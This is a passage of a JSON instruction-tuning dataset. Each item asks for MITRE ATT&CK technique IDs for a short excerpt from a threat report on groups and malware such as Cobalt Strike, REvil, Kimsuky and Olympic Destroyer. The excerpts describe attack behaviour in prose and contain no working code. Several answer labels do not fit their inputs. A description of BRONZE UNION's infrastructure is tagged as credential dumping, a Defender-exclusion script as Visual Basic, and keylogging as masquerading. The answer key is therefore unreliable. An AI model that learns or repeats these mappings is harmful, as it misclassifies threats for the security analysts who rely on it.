techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The adversary used the built-in lateral movement possibilities in Cobalt Strike. Cobalt Strike has various methods for deploying its beacons at newly compromised systems. We have seen the adversary using SMB, named pipes, PsExec, and WinRM. They continue lateral movement and discovery in an attempt to identify the data of interest", + "output": "- T1021.006: Remote Services - Windows Remote Management" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It is used by the financially motivated GOLD SOUTHFIELD threat group, which distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers. CTU\u2122 researchers attribute GandCrab to the GOLD GARDEN threat group", + "output": "- T1133: External Remote Services\n- T1190: Exploit Public-Facing Application" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control (C2) and operational infrastructure. The threat actors also integrate infrastructure they likely previously compromised for espionage purposes. For example, CTU researchers identified the group using IP addresses owned by several, presumably compromised, research organizations to interact with web shells in other target environments", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager\n- T1003.004: OS Credential Dumping - LSA Secrets" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As mentioned previously, this backdoor also supports loading plugins. The server creates a thread that searches for files matching the following pattern lPH*.dll. If such a file exists, it is loaded and its export function ModuleStart is called. Among the various plugins we have located so far, one is able to steal recent files and files from USB thumb drives", + "output": "- T1025: Data from Removable Media\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Phishing emails continued to use links to external ZIP or RAR archives, which ultimately contained an executable with the extension SCR. The attackers also made extensive use of Hostinger\u2019s cheap web hosting services to deliver initial payloads", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After decrypting the C&C server address, the shellcode proceeds to send an HTTP GET request to fetch the resource: \u201cmsdn.cpp\u201d on the\u00a0server", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The backdoor contain narrow capabilities: download and upload files, run commands and send the attackers the results. However short the list, they allow the attackers to upload and execute additional tools for further reconnaissance and lateral movement", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Before running the above command to open the decoy document, the shellcode enumerates the running processes on the system, specifically looking for processes created for an executable with a filename that starts with \u201cavp. presumably in an attempt to find Kaspersky\u2019s antivirus process. If the process is found, the shellcode will not open the decoy document and exits", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This RAT is also known for its keylogging and file transfer functionality. As such, any remote attacker can load any files onto the infected machine or even steal documents", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Registered and active during late June 2020, newspointview[.]com has been used with more recent SombRAT variants as the primary C2 domain", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Exploits a kernel privilege escalation vulnerability to gain SYSTEM privileges using CVE-2018-8453. Whitelists files, folders and extensions from encryption. Encrypts files on local and network storage. Customizes the name and body of the ransom note, and the contents of the background image. Exfiltrates encrypted information on the infected host to remote controllers. REvil uses Hypertext Transfer Protocol Secure (HTTPS) for communication with its controllers", + "output": "- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the DoublePulsar backdoor does not exist, then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit. After the first thread determines the local network subnet, the SMB worm scans local addresses beginning at the start of the netblock and increasing by one to the end of the netblock", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Encryption is definitely the simplest method to hide the C&C server. We have encountered cases where the port has been stored in the data section, in the Delphi form data, or randomly chosen from a range", + "output": "- T1102.001: Web Service - Dead Drop Resolver" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) The malicious macro scans the victim\u2019s Outlook inbox and looks for the strings \u201c$$cpte\u201d and \u201c$$ecpte\u201d. 2) Then the macro will open a CMD shell that will execute whatever instruction / command is in between the strings. 4) The macro searches for the special strings in the \u201cDeleted Items\u201d folder to find the attacker\u2019s email address and sends the data back to the attackers via email. 5) Lastly, the macro will delete any evidence of the emails received or sent by the attackers", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "There are three types of URLs present in the decrypted configuration. The first type of URL listed in the configuration data is used for the plain HTTP (that is, non-Tor) communication with C&C servers. The bot reports to the C&C server using the typical request pattern: for example, the initial checkin to the C&C server is in the form of: cfg_url + \u201c/images/\u201d + encoded_data + (.jpeg||.gif||.bmp", + "output": "- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Similar to many other ransomware operators, CARBON SPIDER not only encrypted victim files using Darkside, but also exfiltrated data for publication on a dedicated leak site (DLS) hosted on Tor. For exfiltration, CARBON SPIDER primarily leveraged the MEGASync client for hosting provider MEGA but also employed GoToAssist", + "output": "- T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kimsuky is a highly motivated APT that has traditionally targeted entities in South Korea. The APT group has used a variety of malware such as Gold Dragon, Babyshark and Appleseed to target entities ranging from defense to education and think tanks. Some file enumerators will exfiltrate all files with specific extensions. What's interesting here, however, is that the attackers knew exactly which files they were looking for", + "output": "- T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Trojan obfuscates its executable code prior to compilation, rather than packing it like most other ransomware, making it harder for researchers to reverse engineer and analyze the malicious code. It also obscures the links to the necessary API function, and stores hashes to strings rather than the actual strings. Upon installation, the Trojan reviews the directory its executable is started from, and if it spots an attempt to launch it from an \u2018incorrect\u2019 directory \u2013 such as a potential automated sandbox \u2013 it exits. Before encrypting files on a victim device, SynAck checks the hashes of all running processes and services against its own hard coded list. If it finds a match, it tries to kill the process", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When the backdoor is configured to use HTTPS to communicate with the C2, the functionality is largely the same as when in HTTP mode. The differences are that it lacks the options to update a session key due to encryption being handled by the TLS layer and it also does not have the option to send data to and from the C2 in the chunking mode previously described. In addition, only one transmission is made to the C2 when the malware is establishing a connection as there is no exchange of an AES session key. The hello message that is sent contains the same plaintext data as the HTTP mode", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method, specifically attempting to load either the Pupy RAT or meterpreter which we have called MagicHound.Rollover. The malicious macros were all designed to use Windows PowerShell to download a shellcode-based payload from a remote server. We discovered two different techniques used in the PowerShell scripts, the first being a straightforward execute command of a string retrieved from the remote server. The second technique appeared to be from a tool called Magic Unicorn, an open source module for meterpreter. Specifically, we discovered code in the PowerShell script that was a match for code in Magic Unicorn containing the comment \u201cone line shellcode injection with native x86 shellcode", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Throughout the year, Volexity identified multiple Vietnamese-language news websites that appeared to be compromised, as they were being used to load an OceanLotus web profiling framework. The exact functionality varied from site to site, but the goal of these frameworks was to gather information about site visitors and, in some cases, deliver malware. This code appears to be a variation of what Volexity has previously described as Framework A", + "output": "- T1583.001: Acquire Infrastructure - Domains" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For example, here is a folder and a list of files created by picking the C:\\Windows\\system32\\TCPSVCS.exe executable as a source of data", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers used both families concurrently from late last year through November 2017 and there is some C2 infrastructure overlap between the two families, as well as links to historical reporting. Reaver Malware Analysis To date, Palo Alto Networks Unit 42 has identified 10 unique samples and three distinct variants of a new malware family we have named \u201cReaver\u201d. As such, we identify each variant as Reaver.v1, Reaver.v2, and Reaver.v3. Reaver.v1 has been observed delivering a payload that uses HTTP for network communication, while versions 2 and 3 use a payload that uses raw TCP connections for this communication. The flow for Reaver is as shown", + "output": "- T1071.001: Application Layer Protocol - Web Protocols\n- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Another payload of the Ecipekac loader, which we call SodaMaster (a.k.a DelfsCake), is also a new fileless malware. In our research we found more than 10 samples of SodaMaster. The only differences were in the configuration data, including a hardcoded C2, an encoded RSA key and additional data for calculating a mutex value", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When executed, the DLL drops and launches using a WinExec API call. This stage of the Valak malware uses a malicious JavaScript file with a random name that changes per execution", + "output": "- T1218.010: System Binary Proxy Execution - Regsvr32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The script modifies Windows Defender settings to exclude the target logical drive it is going to wipe from scheduled and real-time scanning", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. Upon successful intrusion, they have used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. NICKEL actors created and deployed custom malware that allowed them to maintain persistence on victim networks over extended periods of time. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks", + "output": "- T1016: System Network Configuration Discovery\n- T1078: Valid Accounts\n- T1119: Automated Collection\n- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To load the driver, a new service is created using the API CreateServiceW. The name and display name for this service is the 4-character name used for the file name. Next, StartServiceW is called in a loop five times to ensure the driver is loaded. Immediately after the driver is loaded, the service is removed by deleting the entire registry key", + "output": "- T1543.003: Create or Modify System Process - Windows Service\n- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the attackers identify the files of interest, the module is instrumented for exfiltration of the files.The VBScript-based file recon module used by the attackers is somewhat different. The URL constructed had the following format:http://<attacker_controlled_domain/>report.php", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BADNEWS Much of BADNEWS has remained consistent from when it was originally discussed by Forcepoint in August 2016. To briefly recap, the BADNEWS malware family acts as a backdoor, with communication occurring over HTTP. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop. This tactic uses public web services to host content that contains encoded commands that are decoded by the malware", + "output": "- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As we can see, it simply downloads a file from secure.dropinbox[.]pw using HTTP on port 443 (not HTTPS), and proceeds to decrypt the file using AES-128 prior to executing it. At this point, Cardinal RAT has been downloaded and executed, and execution is directed to this sample. Of course, the Carp Downloader is not required to download Cardinal RAT, however, based on our visibility, it has exclusively done so", + "output": "- T1071.001: Application Layer Protocol - Web Protocols\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The use of the legitimate regsvr32.exe application to run a .sct file is an AppLocker bypass technique originally discovered by Casey Smith (@subtee), which eventually resulted in a Metasploit module. The WINDOWSTEMP.ps1 script is a dropper that decodes an embedded executable using base64 and decompresses it with the System.IO.Compression.GzipStream object. The WindowsTemplate.exe executable is a new variant of RogueRobin written in C", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1218.010: System Binary Proxy Execution - Regsvr32\n- T1140: Deobfuscate/Decode Files or Information\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Juniper Threat Labs has been monitoring a campaign that pushes a new IcedID banking trojan. This new campaign changes tactics by injecting into msiexec.exe to conceal itself and use full steganography for downloading its modules and configurations. Previous versions of IcedID injected into svchost.exe and downloaded encrypted modules and config as \u201c.dat\u201d files. IcedID is a banking malware that performs Man-in-the-Browser attacks to steal financial information", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Execution through API (Batch file for example). - Application processes discovery with some procedures as the hashes of the name, and directly for the name of the process. File and directory discovery: to search files to encrypt. Encrypt files. Create files", + "output": "- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware uses at least three separate encryption methods for its traffic, depending on the type of message. The first method, implemented within HTTPDLL.dll, is used for the decryption of values and traffic relating to the HTTP GET requests (i) and (ii) discussed above. It appears to use an implementation of AES to encrypt the data which is then transmitted in its encrypted format. The key (shown in the image below) is apparently static, at least among the samples tested, and generated by drawing byte values from multiple parts of the binary and performing a number of bitwise operations on them", + "output": "- T1132.001: Data Encoding - Standard Encoding\n- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. Olympic Destroyer Workflow . Initial stage . The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. This step is executed to ensure that file recovery is not trivial - WBAdmin can be used to recover individual files, folders and also whole drives so this would be a very convenient tool for a sysadmin to use in order to aid recovery. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"\"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Using legitimate tools like PsExec will save the adversary time from writing their own tooling. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony. Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. categories . Subscribe To Our Feed . Blog Archive . - - - - - - - - - - - - \u25bc February (14) CannibalRAT targets Brazil Who Wasn\u2019t Responsible for Olympic Destroyer\"", + "output": "- T1021.002: Remote Services - SMB/Windows Admin Shares" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze 